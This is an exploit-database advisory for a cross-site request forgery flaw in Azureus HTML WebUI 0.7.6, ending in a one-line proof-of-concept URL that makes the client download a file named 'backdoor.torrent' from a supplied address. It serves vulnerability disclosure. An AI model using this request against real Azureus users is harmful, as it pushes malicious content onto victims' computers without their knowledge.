Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery

EDB-ID:

31673

CVE:

N/A


Author:

th3.r00k

Type:

webapps


Platform:

Multiple

Date:

2008-04-18


source: https://www.securityfocus.com/bid/28848/info

Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability.

Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed.

Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected. 

http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent